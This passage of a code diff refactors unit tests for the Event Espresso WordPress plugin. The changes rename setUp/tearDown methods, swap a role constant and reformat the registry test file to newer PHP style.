-        $administrator_role = get_role(self::ADMINISTRATOR_ROLE);
+        $administrator_role = get_role(EE_Capabilities::ROLE_ADMINISTRATOR);
         $this->assertInstanceOf('WP_Role', $administrator_role);
         // verify that cap exists
         $this->assertTrue($administrator_role->has_cap('ee_manage_gateways'));
         // for whatever reason, this site wants to have all gateways
         // under control of someone other than the standard administrator
         // so they want to remove the 'ee_manage_gateways' cap from the above administrator role
-        $this->CAPS->remove_cap_from_role(self::ADMINISTRATOR_ROLE, 'ee_manage_gateways');
+        $this->CAPS->remove_cap_from_role(EE_Capabilities::ROLE_ADMINISTRATOR, 'ee_manage_gateways');
         $user = $this->setupAdminUserAndTestCapDoesNOtExist('ee_manage_gateways');
         $this->assertFalse(
             $this->CAPS->user_can($user, 'ee_manage_gateways', 'test'),
@@ -253,8 +253,8 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         // verify that no other roles exist that could be granting caps
         $this->assertEmpty($user->roles);
         // now make this user an administrator
-        $user->add_role(self::ADMINISTRATOR_ROLE);
-        $this->assertEquals(self::ADMINISTRATOR_ROLE, reset($user->roles));
+        $user->add_role(EE_Capabilities::ROLE_ADMINISTRATOR);
+        $this->assertEquals(EE_Capabilities::ROLE_ADMINISTRATOR, reset($user->roles));
         return $user;
     }
 
@@ -268,7 +268,7 @@ class EE_Capabilities_Test extends EE_UnitTestCase
         $this->go_to(admin_url());
         // first let's verify that admins do not currently have this cap
         /** @var WP_Role $administrator_role */
-        $administrator_role = get_role(self::ADMINISTRATOR_ROLE);
+        $administrator_role = get_role(EE_Capabilities::ROLE_ADMINISTRATOR);
         $this->assertInstanceOf('WP_Role', $administrator_role);
         // verify two ways that cap does not exist YET...
         $this->assertFalse(isset($administrator_role->capabilities[$mock_onsite_capability]));

--- a/tests/testcases/core/EE_Cart_Test.php
+++ b/tests/testcases/core/EE_Cart_Test.php
@@ -29,8 +29,8 @@ class EE_Cart_Test extends EE_UnitTestCase{
      * @throws \EventEspresso\core\exceptions\InvalidDataTypeException
      * @throws \EventEspresso\core\exceptions\InvalidInterfaceException
      */
-    public function setUp(){
-		parent::setUp();
+    public function set_up(){
+		parent::set_up();
 		require_once EE_TESTS_DIR . 'mocks/core/EE_Session_Mock.core.php';
 		$this->_session = LoaderFactory::getLoader()->getShared('EE_Session_Mock');
         EE_Cart::reset( null, $this->_session );

--- a/tests/testcases/core/EE_Encryption_Test.php
+++ b/tests/testcases/core/EE_Encryption_Test.php
@@ -33,9 +33,9 @@ class EE_Encryption_Test extends EE_UnitTestCase
     /**
      * @throws EE_Error
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         require_once EE_TESTS_DIR . 'mocks/core/EE_Encryption_Mock.php';
         $this->encryption = EE_Encryption_Mock::instance();
         $this->rdg = new RandomDataGenerator();

--- a/tests/testcases/core/EE_Maintenance_Mode_Test.php
+++ b/tests/testcases/core/EE_Maintenance_Mode_Test.php
@@ -91,8 +91,8 @@ class EE_Maintenance_Mode_Test extends EE_UnitTestCase{
 	/**
 	 * the DMS manager maintains a bit of state in order to be more efficient, which we want to lose between tests
 	 */
-	public function setUp(){
-        parent::setUp();
+	public function set_up(){
+        parent::set_up();
 	    EE_Data_Migration_Manager::reset();
 	}
 }

--- a/tests/testcases/core/EE_Object_Collection_Test.php
+++ b/tests/testcases/core/EE_Object_Collection_Test.php
@@ -17,8 +17,8 @@ class EE_Object_Collection_Test extends EE_UnitTestCase {
 	 */
 	protected $collection;
 
-	public function setUp() {
-        parent::setUp();
+	public function set_up() {
+        parent::set_up();
 		require_once EE_TESTS_DIR . 'mocks/core/EE_Object_Collection_Mock.php';
 		$this->collection = new EE_Object_Collection_Mock();
 	}

--- a/tests/testcases/core/EE_Object_Repository_Test.php
+++ b/tests/testcases/core/EE_Object_Repository_Test.php
@@ -17,8 +17,8 @@ class EE_Object_Repository_Test extends EE_UnitTestCase {
 	 */
 	protected $repository;
 
-	public function setUp() {
-        parent::setUp();
+	public function set_up() {
+        parent::set_up();
 		require_once EE_TESTS_DIR . 'mocks/core/EE_Object_Repository_Mock.php';
 		$this->repository = new EE_Object_Repository_Mock();
 	}

--- a/tests/testcases/core/EE_Payment_Processor_Test.php
+++ b/tests/testcases/core/EE_Payment_Processor_Test.php
@@ -15,9 +15,9 @@ if (! defined('EVENT_ESPRESSO_VERSION')) {
 class EE_Payment_Processor_Test extends EE_UnitTestCase
 {
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_pretend_addon_hook_time();
         EE_Register_Payment_Method::register(
             'onsite',
@@ -44,11 +44,11 @@ class EE_Payment_Processor_Test extends EE_UnitTestCase
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         EE_Register_Payment_Method::deregister('onsite');
         EE_Register_Payment_Method::deregister('offsite');
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/EE_Payment_Processor_With_Messages_Test.php
+++ b/tests/testcases/core/EE_Payment_Processor_With_Messages_Test.php
@@ -25,8 +25,8 @@ class EE_Payment_Processor_With_Messages_Test extends EE_Payment_Processor_Test{
 	 * unit tests inherited from parent
 	 */
 
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		$this->_pretend_addon_hook_time();
 		EE_Register_Payment_Method::register('onsite', array(
 			'payment_method_paths'=>array(
@@ -44,10 +44,10 @@ class EE_Payment_Processor_With_Messages_Test extends EE_Payment_Processor_Test{
 		//and so we want to leave messages hooks in-place
 
 	}
-	public function tearDown(){
+	public function tear_down(){
 		EE_Register_Payment_Method::deregister( 'onsite' );
 		EE_Register_Payment_Method::deregister( 'offsite' );
-		parent::tearDown();
+		parent::tear_down();
 	}
 }
 

--- a/tests/testcases/core/EE_Registry_Test.php
+++ b/tests/testcases/core/EE_Registry_Test.php
@@ -24,7 +24,7 @@ class EE_Registry_Test extends EE_UnitTestCase{
      * @throws \EventEspresso\core\exceptions\InvalidDataTypeException
      * @throws \EventEspresso\core\exceptions\InvalidInterfaceException
      */
-    public function setUp() {
+    public function set_up() {
 		add_filter(
 			'FHEE__EE_Registry____construct___class_abbreviations',
 			array( $this, 'unit_test_registry_class_abbreviations' )
@@ -55,7 +55,7 @@ class EE_Registry_Test extends EE_UnitTestCase{
             $loader->getShared('EventEspresso\core\services\loaders\ObjectIdentifier')
         );
 		EE_Registry_Mock::instance()->initialize();
-		parent::setUp();
+		parent::set_up();
 	}
 
 

--- a/tests/testcases/core/EE_Registry_Test.php
+++ b/tests/testcases/core/EE_Registry_Test.php
@@ -1,395 +1,412 @@
 <?php
 
+use EventEspresso\core\exceptions\InvalidDataTypeException;
+use EventEspresso\core\exceptions\InvalidInterfaceException;
 use EventEspresso\core\services\loaders\LoaderFactory;
 
-if (!defined('EVENT_ESPRESSO_VERSION')) {
-	exit('No direct script access allowed');
-}
 /**
  *
  * EE_Registry_Test
  *
- * @package            Event Espresso
- * @subpackage    core
+ * @package               Event Espresso
+ * @subpackage            core
  * @author                Mike Nelson, Brent Christensen
  *
  */
-class EE_Registry_Test extends EE_UnitTestCase{
+class EE_Registry_Test extends EE_UnitTestCase
+{
 
     /**
      * @throws DomainException
      * @throws EE_Error
      * @throws InvalidArgumentException
      * @throws ReflectionException
-     * @throws \EventEspresso\core\exceptions\InvalidDataTypeException
-     * @throws \EventEspresso\core\exceptions\InvalidInterfaceException
+     * @throws InvalidDataTypeException
+     * @throws InvalidInterfaceException
      */
-    public function set_up() {
-		add_filter(
-			'FHEE__EE_Registry____construct___class_abbreviations',
-			array( $this, 'unit_test_registry_class_abbreviations' )
-		);
-		add_filter(
-			'FHEE__EE_Registry__load_core__core_paths',
-			array( $this, 'unit_test_registry_core_paths' )
-		);
-		EE_Dependency_Map::register_dependencies(
-			'EE_Session_Mock',
-            array(
-                'EventEspresso\core\services\cache\TransientCacheStorage' => EE_Dependency_Map::load_from_cache,
-                'EE_Encryption'                                           => EE_Dependency_Map::load_from_cache
-            )
+    public function set_up()
+    {
+        add_filter(
+            'FHEE__EE_Registry____construct___class_abbreviations',
+            [$this, 'unit_test_registry_class_abbreviations']
         );
-		EE_Dependency_Map::register_dependencies(
-			'EE_Injector_Tester_With_Array_Session_Int_Constructor_Params',
-			array( 'EE_Session_Mock' => EE_Dependency_Map::load_from_cache )
-		);
-		EE_Dependency_Map::register_class_loader( 'EE_Session_Mock' );
-		EE_Dependency_Map::register_class_loader( 'EE_Injector_Tester_With_Array_Session_Int_Constructor_Params' );
-		require_once EE_TESTS_DIR . 'mocks/core/EE_Registry_Mock.core.php';
-		$loader = LoaderFactory::getLoader();
-		EE_Registry_Mock::instance(
-		    EE_Dependency_Map::instance(),
+        add_filter(
+            'FHEE__EE_Registry__load_core__core_paths',
+            [$this, 'unit_test_registry_core_paths']
+        );
+        EE_Dependency_Map::register_dependencies(
+            'EE_Session_Mock',
+            [
+                'EventEspresso\core\services\cache\TransientCacheStorage' => EE_Dependency_Map::load_from_cache,
+                'EE_Encryption'                                           => EE_Dependency_Map::load_from_cache,
+            ]
+        );
+        EE_Dependency_Map::register_dependencies(
+            'EE_Injector_Tester_With_Array_Session_Int_Constructor_Params',
+            ['EE_Session_Mock' => EE_Dependency_Map::load_from_cache]
+        );
+        EE_Dependency_Map::register_class_loader('EE_Session_Mock');
+        EE_Dependency_Map::register_class_loader('EE_Injector_Tester_With_Array_Session_Int_Constructor_Params');
+        require_once EE_TESTS_DIR . 'mocks/core/EE_Registry_Mock.core.php';
+        $loader = LoaderFactory::getLoader();
+        EE_Registry_Mock::instance(
+            EE_Dependency_Map::instance(),
             $loader->getShared('EventEspresso\core\services\container\Mirror'),
             $loader->getShared('EventEspresso\core\services\loaders\ClassInterfaceCache'),
             $loader->getShared('EventEspresso\core\services\loaders\ObjectIdentifier')
         );
-		EE_Registry_Mock::instance()->initialize();
-		parent::set_up();
-	}
+        EE_Registry_Mock::instance()->initialize();
+        parent::set_up();
+    }
 
 
-
-	/**
-	 * @param array $class_abbreviations
-	 * @return array
-	 */
-	public function unit_test_registry_class_abbreviations( $class_abbreviations = array() ) {
-		$class_abbreviations[ 'EE_Session_Mock' ] = 'SSN';
-		return $class_abbreviations;
-	}
-
-
-
-	/**
-	 * @param array $core_paths
-	 * @return array
-	 */
-	public function unit_test_registry_core_paths( $core_paths = array() ) {
-		$core_paths[] = EE_TESTS_DIR . 'mocks/core/';
-		return $core_paths;
-	}
+    /**
+     * @param array $class_abbreviations
+     * @return array
+     */
+    public function unit_test_registry_class_abbreviations(array $class_abbreviations = []): array
+    {
+        $class_abbreviations['EE_Session_Mock'] = 'SSN';
+        return $class_abbreviations;
+    }
 
 
+    /**
+     * @param array $core_paths
+     * @return array
+     */
+    public function unit_test_registry_core_paths(array $core_paths = []): array
+    {
+        $core_paths[] = EE_TESTS_DIR . 'mocks/core/';
+        return $core_paths;
+    }
 
 
-	/**
-	 * this tests that objects cached using the EE_Registry class abbreviations can be retrieved
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_get_cached_class_abbreviations() {
-		// verify that EE_Network_Config has not already been loaded
-		$cached_class = EE_Registry_Mock::instance()->get_cached_class( 'EE_Network_Config' );
-		$this->assertEquals( null, $cached_class );
-		// create a stdClass object will use to mock the EE_Network_Config class
-		$orig_class = new stdClass();
-		$orig_class->name = 'EE_Network_Config';
-		// and manually cache it at EE_Registry_Mock::instance()->NET_CFG
-		EE_Registry_Mock::instance()->NET_CFG = $orig_class;
-		// now attempt to retrieve it
-		$cached_class = EE_Registry_Mock::instance()->get_cached_class( 'EE_Network_Config' );
-		$this->assertEquals( $orig_class->name, $cached_class->name );
-		// remove what we added
-		EE_Registry_Mock::instance()->NET_CFG = null;
-	}
+    /**
+     * this tests that objects cached using the EE_Registry class abbreviations can be retrieved
+     *
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_get_cached_class_abbreviations()
+    {
+        // verify that EE_Network_Config has not already been loaded
+        $cached_class = EE_Registry_Mock::instance()->get_cached_class('EE_Network_Config');
+        $this->assertEquals(null, $cached_class);
+        // create a stdClass object will use to mock the EE_Network_Config class
+        $orig_class       = new stdClass();
+        $orig_class->name = 'EE_Network_Config';
+        // and manually cache it at EE_Registry_Mock::instance()->NET_CFG
+        EE_Registry_Mock::instance()->NET_CFG = $orig_class;
+        // now attempt to retrieve it
+        $cached_class = EE_Registry_Mock::instance()->get_cached_class('EE_Network_Config');
+        $this->assertEquals($orig_class->name, $cached_class->name);
+        // remove what we added
+        EE_Registry_Mock::instance()->NET_CFG = null;
+    }
 
 
-
-	/**
-	 * this tests that objects cached directly as EE_Registry_Mock properties can be retrieved
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_get_cached_class_property() {
-		// verify that "Some_Class" has not already been loaded
-		$cached_class = EE_Registry_Mock::instance()->get_cached_class( 'Some_Class' );
-		$this->assertEquals( null, $cached_class );
-		// create a stdClass object will use to mock the class
-		$orig_class = new stdClass();
-		$orig_class->name = 'Some_Class';
-		// and manually cache it at EE_Registry_Mock::instance()->Some_Class
-		EE_Registry_Mock::instance()->Some_Class = $orig_class;
-		// now attempt to retrieve it
-		$cached_class = EE_Registry_Mock::instance()->get_cached_class( 'Some_Class' );
-		$this->assertEquals( $orig_class->name, $cached_class->name );
-	}
-
-
-
-	/**
-	 * this tests that objects cached on EE_Registry->LIB can be retrieved
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_get_cached_class_library() {
-		// verify that "Library_Class" has not already been loaded
-		$cached_class = EE_Registry_Mock::instance()->get_cached_class( 'Library_Class' );
-		$this->assertEquals( null, $cached_class );
-		// create a stdClass object will use to mock the class
-		$orig_class = new stdClass();
-		$orig_class->name = 'Library_Class';
-		// and manually cache it at EE_Registry_Mock::instance()->Some_Class
-		EE_Registry_Mock::instance()->LIB->Library_Class = $orig_class;
-		// now attempt to retrieve it
-		$cached_class = EE_Registry_Mock::instance()->get_cached_class( 'Library_Class' );
-		$this->assertEquals( $orig_class->name, $cached_class->name );
-	}
+    /**
+     * this tests that objects cached directly as EE_Registry_Mock properties can be retrieved
+     *
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_get_cached_class_property()
+    {
+        // verify that "Some_Class" has not already been loaded
+        $cached_class = EE_Registry_Mock::instance()->get_cached_class('Some_Class');
+        $this->assertEquals(null, $cached_class);
+        // create a stdClass object will use to mock the class
+        $orig_class       = new stdClass();
+        $orig_class->name = 'Some_Class';
+        // and manually cache it at EE_Registry_Mock::instance()->Some_Class
+        EE_Registry_Mock::instance()->Some_Class = $orig_class;
+        // now attempt to retrieve it
+        $cached_class = EE_Registry_Mock::instance()->get_cached_class('Some_Class');
+        $this->assertEquals($orig_class->name, $cached_class->name);
+    }
 
 
-
-	/**
-	 * this tests that objects cached on EE_Registry->addons can be retrieved
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_get_cached_class_addon() {
-		// verify that "Addon_Class" has not already been loaded
-		$cached_class = EE_Registry_Mock::instance()->get_cached_class( 'Addon_Class', 'addon' );
-		$this->assertEquals( null, $cached_class );
-		// create a stdClass object will use to mock the class
-		$orig_class = new stdClass();
-		$orig_class->name = 'Addon_Class';
-		// and manually cache it at EE_Registry_Mock::instance()->addons->Addon_Class
-		EE_Registry_Mock::instance()->addons->Addon_Class = $orig_class;
-		// now attempt to retrieve it
-		$cached_class = EE_Registry_Mock::instance()->get_cached_class( 'Addon_Class', 'addon' );
-		$this->assertEquals( $orig_class->name, $cached_class->name );
-	}
-
-
-	/**
-	 * This tests that the _file_loaded_for_class property is retrieved/utilized properly when load_only flag is set to
-	 * true on the EE_Registry instance.
-	 * @author Darren Ethier
-	 */
-	public function test__load_with_load_only_flag() {
-		// now do a object load request for EE_Answer
-		$class_loaded = EE_Registry_Mock::instance()->load_class( 'EE_Answer' );
-		$this->assertInstanceOf( 'EE_Answer', $class_loaded );
-		// now verify that with the $load_only flag set to true, that boolean true is returned
-		$file_loaded = EE_Registry_Mock::instance()->load(
-			array( EE_CLASSES ),
-			'EE_',
-			'EE_Answer',
-			'class',
-			array(),
-			false,
-			true,
-			true // LOAD ONLY FLAG SET TO TRUE
-		);
-		$this->assertTrue( $file_loaded );
-
-	}
+    /**
+     * this tests that objects cached on EE_Registry->LIB can be retrieved
+     *
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_get_cached_class_library()
+    {
+        // verify that "Library_Class" has not already been loaded
+        $cached_class = EE_Registry_Mock::instance()->get_cached_class('Library_Class');
+        $this->assertEquals(null, $cached_class);
+        // create a stdClass object will use to mock the class
+        $orig_class       = new stdClass();
+        $orig_class->name = 'Library_Class';
+        // and manually cache it at EE_Registry_Mock::instance()->Some_Class
+        EE_Registry_Mock::instance()->LIB->Library_Class = $orig_class;
+        // now attempt to retrieve it
+        $cached_class = EE_Registry_Mock::instance()->get_cached_class('Library_Class');
+        $this->assertEquals($orig_class->name, $cached_class->name);
+    }
 
 
-	/**
-	 * Same as previous test except we do a load only call first.  The second call should return the cached object
-	 * and NOT true.
-	 * @author Darren Ethier
-	 * @group 9326
-	 */
-	public function test__load_with_load_only_flag_set_true_on_first_load() {
-		//do load only
-		$loaded = EE_Registry_Mock::instance()->load_class(
-			'EE_Answer',
-			array(),
-			false,
-			true,
-			true //load only set to true.
-		);
-
-		//should return true
-		$this->assertTrue( $loaded );
-		//should be able to access the class now
-		$this->assertTrue( class_exists( 'EE_Answer', false ) );
-
-		//now try to grab an instance of EE_Answer
-		$class_instance = EE_Registry_Mock::instance()->load_class( 'EE_Answer' );
-		$this->assertInstanceOf( 'EE_Answer', $class_instance );
-	}
+    /**
+     * this tests that objects cached on EE_Registry->addons can be retrieved
+     *
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_get_cached_class_addon()
+    {
+        // verify that "Addon_Class" has not already been loaded
+        $cached_class = EE_Registry_Mock::instance()->get_cached_class('Addon_Class', 'addon');
+        $this->assertEquals(null, $cached_class);
+        // create a stdClass object will use to mock the class
+        $orig_class       = new stdClass();
+        $orig_class->name = 'Addon_Class';
+        // and manually cache it at EE_Registry_Mock::instance()->addons->Addon_Class
+        EE_Registry_Mock::instance()->addons->Addon_Class = $orig_class;
+        // now attempt to retrieve it
+        $cached_class = EE_Registry_Mock::instance()->get_cached_class('Addon_Class', 'addon');
+        $this->assertEquals($orig_class->name, $cached_class->name);
+    }
 
 
+    /**
+     * This tests that the _file_loaded_for_class property is retrieved/utilized properly when load_only flag is set to
+     * true on the EE_Registry instance.
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @author Darren Ethier
+     */
+    public function test__load_with_load_only_flag()
+    {
+        // now do a object load request for EE_Answer
+        $class_loaded = EE_Registry_Mock::instance()->load_class('EE_Answer');
+        $this->assertInstanceOf('EE_Answer', $class_loaded);
+        // now verify that with the $load_only flag set to true, that boolean true is returned
+        $file_loaded = EE_Registry_Mock::instance()->load(
+            [EE_CLASSES],
+            'EE_',
+            'EE_Answer',
+            'class',
+            [],
+            false,
+            true,
+            true // LOAD ONLY FLAG SET TO TRUE
+        );
+        $this->assertTrue($file_loaded);
+    }
 
 
-	/**
-	 * this tests that paths to EE class files can be resolved correctly
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_resolve_path(){
-		// try to find the path to the EE_Session class
-		$this->assertEquals(
-			// expected
-			str_replace( array( '\\', '/' ), '/', EE_CORE . 'EE_Session.core.php' ),
-			// actual
-			EE_Registry_Mock::instance()->resolve_path(
-				'EE_Session',
-				'core',
-				array(
-					EE_CORE,
-					EE_ADMIN,
-					EE_CPTS,
-					EE_CORE . 'data_migration_scripts/'
-				)
-			)
-		);
-	}
+    /**
+     * Same as previous test except we do a load only call first.  The second call should return the cached object
+     * and NOT true.
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @author Darren Ethier
+     * @group  9326
+     */
+    public function test__load_with_load_only_flag_set_true_on_first_load()
+    {
+        //do load only
+        $loaded = EE_Registry_Mock::instance()->load_class(
+            'EE_Answer',
+            [],
+            false,
+            true,
+            true //load only set to true.
+        );
+
+        //should return true
+        $this->assertTrue($loaded);
+        //should be able to access the class now
+        $this->assertTrue(class_exists('EE_Answer', false));
+
+        //now try to grab an instance of EE_Answer
+        $class_instance = EE_Registry_Mock::instance()->load_class('EE_Answer');
+        $this->assertInstanceOf('EE_Answer', $class_instance);
+    }
 
 
+    /**
+     * this tests that paths to EE class files can be resolved correctly
+     *
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_resolve_path()
+    {
+        // try to find the path to the EE_Session class
+        $this->assertEquals(
+        // expected
+            str_replace(['\\', '/'], '/', EE_CORE . 'EE_Session.core.php'),
+            // actual
+            EE_Registry_Mock::instance()->resolve_path(
+                'EE_Session',
+                'core',
+                [
+                    EE_CORE,
+                    EE_ADMIN,
+                    EE_CPTS,
+                    EE_CORE . 'data_migration_scripts/',
+                ]
+            )
+        );
+    }
 
 
-	/**
-	 * this tests that EE class files can be loaded correctly
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_require_file(){
-		// first verify that EE_Class_For_Testing_Loading is not already loaded
-		// (made sure to set the class_exists() autoload param to false)
-		$this->assertEquals( false, class_exists( 'EE_Class_For_Testing_Loading', false ) );
-		// let's attempt to load the EE_Cart
-		EE_Registry_Mock::instance()->require_file(
-			EE_MOCKS_DIR . 'core/EE_Class_For_Testing_Loading.core.php',
-			'EE_Class_For_Testing_Loading',
-			'core',
-			array(
-				EE_CORE,
-				EE_ADMIN,
-				EE_CORE . 'data_migration_scripts/',
-				EE_MOCKS_DIR,
-				EE_MOCKS_DIR . 'core/',
-			)
-		);
-		$this->assertEquals( true, class_exists( 'EE_Class_For_Testing_Loading', false ) );
-	}
+    /**
+     * this tests that EE class files can be loaded correctly
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_require_file()
+    {
+        // first verify that EE_Class_For_Testing_Loading is not already loaded
+        // (made sure to set the class_exists() autoload param to false)
+        $this->assertEquals(false, class_exists('EE_Class_For_Testing_Loading', false));
+        // let's attempt to load the EE_Cart
+        EE_Registry_Mock::instance()->require_file(
+            EE_MOCKS_DIR . 'core/EE_Class_For_Testing_Loading.core.php',
+            'EE_Class_For_Testing_Loading',
+            'core',
+            [
+                EE_CORE,
+                EE_ADMIN,
+                EE_CORE . 'data_migration_scripts/',
+                EE_MOCKS_DIR,
+                EE_MOCKS_DIR . 'core/',
+            ]
+        );
+        $this->assertEquals(true, class_exists('EE_Class_For_Testing_Loading', false));
+    }
 
 
+    /**
+     * this tests that abstract EE class files are loaded but not instantiated
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_create_object_abstract()
+    {
+        // let's attempt to load the abstract EE_Addon class file
+        require_once(EE_CORE . 'EE_Addon.core.php');
+        $this->assertEquals(true, class_exists('EE_Addon'));
+        // now attempt instantiation
+        $class_object = EE_Registry_Mock::instance()->create_object('EE_Addon');
+        // abstract classes only return true to denote that they have been loaded
+        $this->assertEquals(true, $class_object);
+    }
 
 
-	/**
-	 * this tests that abstract EE class files are loaded but not instantiated
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_create_object_abstract(){
-		// let's attempt to load the abstract EE_Addon class file
-		require_once( EE_CORE . 'EE_Addon.core.php' );
-		$this->assertEquals( true, class_exists( 'EE_Addon' ) );
-		// now attempt instantiation
-		$class_object = EE_Registry_Mock::instance()->create_object( 'EE_Addon' );
-		// abstract classes only return true to denote that they have been loaded
-		$this->assertEquals( true, $class_object );
-	}
+    /**
+     * this tests that EE model object classes can be instantiated correctly
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_create_object_new_instance_from_db()
+    {
+        // let's attempt to load an instantiate an EE_Question object with ID=1
+        require_once(EE_CLASSES . 'EE_Question.class.php');
+        $this->assertEquals(true, class_exists('EE_Question'));
+        // now attempt instantiation
+        $class_object = EE_Registry_Mock::instance()->create_object(
+            'EE_Question',
+            [['QST_ID' => 1]],
+            'class',
+            true // FROM DB FLAG SET TO TRUE
+        );
+        $this->assertEquals(true, $class_object instanceof EE_Question);
+        $this->assertEquals(1, $class_object->ID());
+    }
 
 
+    /**
+     * this tests that EE model object classes can be instantiated correctly
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_create_object_new_instance()
+    {
+        // let's attempt to load an instantiate an EE_Question object with ID=1
+        // despite the fact that we just loaded the file in a previous test,
+        // let's just double check that the class exists
+        require_once(EE_CLASSES . 'EE_Question.class.php');
+        $this->assertEquals(true, class_exists('EE_Question'));
+        // now attempt instantiation
+        $class_object = EE_Registry_Mock::instance()->create_object(
+            'EE_Question',
+            [],
+            'class'
+        );
+        $this->assertEquals(true, $class_object instanceof EE_Question);
+        $this->assertEquals(0, $class_object->ID());
+    }
 
 
-	/**
-	 * this tests that EE model object classes can be instantiated correctly
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_create_object_new_instance_from_db() {
-		// let's attempt to load an instantiate an EE_Question object with ID=1
-		require_once( EE_CLASSES . 'EE_Question.class.php' );
-		$this->assertEquals( true, class_exists( 'EE_Question' ) );
-		// now attempt instantiation
-		$class_object = EE_Registry_Mock::instance()->create_object(
-			'EE_Question',
-			array( array( 'QST_ID' => 1 ) ),
-			'class',
-			true // FROM DB FLAG SET TO TRUE
-		);
-		$this->assertEquals( true, $class_object instanceof EE_Question );
-		$this->assertEquals( 1, $class_object->ID() );
-	}
+    /**
+     * this tests that EE class files can be instantiated correctly
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_create_object_isInstantiable()
+    {
+        // let's attempt to load the EE_Module_Request_Router class file
+        require_once(EE_CORE . 'EE_Module_Request_Router.core.php');
+        $this->assertEquals(true, class_exists('EE_Module_Request_Router'));
+        // now attempt instantiation
+        $class_object = EE_Registry_Mock::instance()->create_object('EE_Module_Request_Router');
+        $this->assertEquals(true, $class_object instanceof EE_Module_Request_Router);
+    }
 
 
-
-	/**
-	 * this tests that EE model object classes can be instantiated correctly
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_create_object_new_instance() {
-		// let's attempt to load an instantiate an EE_Question object with ID=1
-		// despite the fact that we just loaded the file in a previous test,
-		// let's just double check that the class exists
-		require_once( EE_CLASSES . 'EE_Question.class.php' );
-		$this->assertEquals( true, class_exists( 'EE_Question' ) );
-		// now attempt instantiation
-		$class_object = EE_Registry_Mock::instance()->create_object(
-			'EE_Question',
-			array(),
-			'class'
-		);
-		$this->assertEquals( true, $class_object instanceof EE_Question );
-		$this->assertEquals( 0, $class_object->ID() );
-	}
+    /**
+     * this tests that EE singleton classes can be instantiated correctly
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_create_object_singleton()
+    {
+        // let's attempt to load the EE_Capabilities class file
+        require_once(EE_CORE . 'EE_Capabilities.core.php');
+        $this->assertEquals(true, class_exists('EE_Capabilities'));
+        // now attempt instantiation
+        $class_object = EE_Registry_Mock::instance()->create_object('EE_Capabilities');
+        $this->assertEquals(true, $class_object instanceof EE_Capabilities);
+    }
 
 
-
-	/**
-	 * this tests that EE class files can be instantiated correctly
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_create_object_isInstantiable(){
-		// let's attempt to load the EE_Module_Request_Router class file
-		require_once( EE_CORE . 'EE_Module_Request_Router.core.php' );
-		$this->assertEquals( true, class_exists( 'EE_Module_Request_Router' ) );
-		// now attempt instantiation
-		$class_object = EE_Registry_Mock::instance()->create_object( 'EE_Module_Request_Router' );
-		$this->assertEquals( true, $class_object instanceof EE_Module_Request_Router );
-	}
-
-
-
-	/**
-	 * this tests that EE singleton classes can be instantiated correctly
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_create_object_singleton(){
-		// let's attempt to load the EE_Capabilities class file
-		require_once(EE_CORE . 'EE_Capabilities.core.php' );
-		$this->assertEquals( true, class_exists( 'EE_Capabilities' ) );
-		// now attempt instantiation
-		$class_object = EE_Registry_Mock::instance()->create_object( 'EE_Capabilities' );
-		$this->assertEquals( true, $class_object instanceof EE_Capabilities );
-	}
-
-
-
-	/**
-	 * this tests that EE classes with core dependencies can be instantiated correctly
-	 *
-	 * @group                8284
-	 * @author                Brent Christensen
-	 */
-	public function test_create_object_and_resolve_dependencies(){
+    /**
+     * this tests that EE classes with core dependencies can be instantiated correctly
+     *
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @group                 8284
+     * @author                Brent Christensen
+     */
+    public function test_create_object_and_resolve_dependencies()
+    {
         $this->dependency_map->registerDependencies(
             'EE_Front_Controller',
             [
@@ -398,372 +415,386 @@ class EE_Registry_Test extends EE_UnitTestCase{
                 'EE_Module_Request_Router'                        => EE_Dependency_Map::load_from_cache,
             ]
         );
-		// let's attempt to load the EE_Front_Controller class file
-		require_once( EE_CORE . 'EE_Front_Controller.core.php' );
-		$this->assertEquals( true, class_exists( 'EE_Front_Controller' ) );
-		// now attempt instantiation knowing that the EE_Front_Controller class
-		// injects the EE_Module_Request_Router class in the constructor
-		/** @type EE_Front_Controller $class_object */
-		$class_object = EE_Registry_Mock::instance()->create_object( 'EE_Front_Controller' );
-		$this->assertInstanceOf( 'EE_Front_Controller', $class_object );
-		//echo "\n Request_Handler: \n";
